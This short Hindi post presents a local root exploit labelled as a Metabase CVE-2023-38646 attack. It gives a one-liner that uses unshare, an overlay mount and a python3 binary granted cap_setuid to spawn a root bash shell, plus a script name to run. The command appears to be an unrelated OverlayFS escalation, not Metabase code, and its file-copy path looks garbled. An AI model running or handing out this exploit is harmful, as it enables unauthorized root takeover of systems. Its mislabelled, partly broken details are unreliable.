
CVE-2023-38646 के लिए Metabase में शोषण, जो unshare और setuid तकनीकों के माध्यम से रिमोट कोड निष्पादन और रूट तक विशेषाधिकार वृद्धि प्राप्त करता है।
ऊपर दी गई जानकारी के अनुसार मशीन या सिस्टम का रूट उपयोगकर्ता प्राप्त करने के लिए, यह कमांड और फ़ाइल रूट उपयोगकर्ता में प्रवेश करेंगे।
आप इस कमांड को सीधे चला सकते हैं या फ़ाइल के रूप में चलाकर निष्पादित कर सकते हैं। कमांड: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
निष्पादित फ़ाइल: $./exploitsh.sh
वाह!